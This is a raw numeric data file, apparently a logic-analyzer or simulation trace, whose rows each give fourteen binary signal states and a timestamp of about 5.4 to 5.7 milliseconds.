1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4150120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4150360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4150600e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4150840e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4151120e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4151360e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4151640e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4151920e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4152160e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,5.4152440e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,5.4152680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,5.5401040e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.5403240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5403440e-03 0,1,0,1,1,0,0,0,0,0,0,1,0,1,5.5403720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5403960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,5.5407000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5407240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,5.5407720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5407960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,5.5408200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5408480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,5.5408720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5408960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,5.5409240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.5409480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,5.5409960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5410040e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5410200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5410440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5410720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5411240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5411480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5411720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5411960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5412200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5412440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5412720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5412960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5413240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5413480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5413960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5414200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5414480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5414720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5415240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5415480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5415720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5415960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5416480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5416720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5417240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5417480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5417960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5418200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5418480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5418720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5418960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5419240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5419480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5419720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5420200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5420480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5421000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5421240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5421720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5421960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5422200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5422440e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5422520e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,5.5423000e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5423240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5423320e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5423480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5423720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5423960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5424200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5424440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5424720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5424960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5425240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5425720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5425960e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5426040e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,5.5426200e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5426440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5426520e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5426720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5426960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5427240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5427480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5427960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5428200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5428480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5428720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5429240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5429480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5429960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5430200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5430720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5431000e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5431240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5431480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5431720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5431960e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5432040e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,5.5432480e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5432720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5432800e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5433000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5433240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5433720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5433960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5434480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5434720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5435240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5435480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5435720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5435960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5436200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5436440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5436720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5436960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5437480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5437720e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5437800e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,5.5437960e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5438200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5438280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5438480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5438720e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5438760e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,5.5439240e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,5.5439480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5439560e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5439720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5439960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5440200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5440440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5441000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5441240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5441480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5441720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5442200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5442480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5443000e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5443240e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5443720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5443960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5444200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5444440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5444720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5444960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5445240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5445480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5445720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5445960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5446200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5446440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5446720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5446960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5447240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5447480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5447720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5447960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5448200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5448440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5448720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5448960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5449240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5449480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5449720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5449960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5450200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5450440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5450720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5450960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5451240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5451480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5451720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5451960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5452200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5452440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5452720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5452960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5453240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5453480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5453720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5453960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5454200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5454440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5454720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5454960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5455240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5455480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5455720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5455960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5456200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5456440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5456720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5456960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5457240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5457480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5457720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5457960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5458200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5458440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5458720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5458960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5459240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5459480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5459720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5459960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5460200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5460440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5460720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5460960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5461240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5461480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5461720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5461960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5462200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5462440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5462720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5462960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5463240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5463480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5463720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5463960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5464200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5464440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5464720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5464960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5465240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5465480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5465720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5465960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5466200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5466440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5466720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5466960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5467240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5467480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5467720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5467960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5468200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5468440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5468720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5468960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5469240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5469480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5469720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5469960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5470200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5470440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5470720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5470960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5471240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5471480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5471720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5471960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5472200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5472440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5472720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5472960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5473240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5473480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5473720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5473960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5474200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5474440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5474720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5474960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5475240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5475480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5475720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5475960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5476200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5476440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5476680e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5476920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,5.5477200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,5.5477440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6720760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6722760e-03 1,1,0,1,1,0,0,0,0,0,0,1,0,1,5.6722920e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6723240e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,5.6726120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6726360e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,5.6726440e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,1,5.6726840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,5.6727080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6727160e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,5.6727320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6727600e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,5.6727840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6728120e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,5.6728360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.6728600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,5.6728640e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6729080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6729360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6729400e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6729600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6729840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6729880e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6730360e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6730600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6730680e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6730840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6731080e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6731320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6731600e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6731840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6732120e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6732360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6732600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6732640e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6733080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6733320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6733400e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6733600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6733840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6733880e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6734360e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6734600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6734680e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6735080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6735360e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6735400e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6735600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6735840e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6736120e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6736360e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6736600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6736840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6736920e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6737360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6737600e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6737840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6738120e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6738600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6738840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6738920e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6739080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6739320e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6739600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6739840e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6740120e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6740360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6740440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6740840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6741080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6741160e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6741600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6741880e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6741920e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6742120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6742360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6742600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6742840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6743080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6743320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6743880e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,5.6744120e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6744160e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6744600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6744840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6744920e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6745360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6745600e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6745880e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6746120e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6746360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6746600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6746640e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6746840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6747080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6747160e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6747600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6747880e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6748120e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6748360e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6748600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6748840e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6749080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6749320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6749400e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6749880e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6750120e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6750360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6750600e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,5.6750640e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6750680e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6751080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6751320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6751400e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6751880e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,5.6752120e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6752160e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6752360e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6752600e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6752840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6753080e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6753320e-03 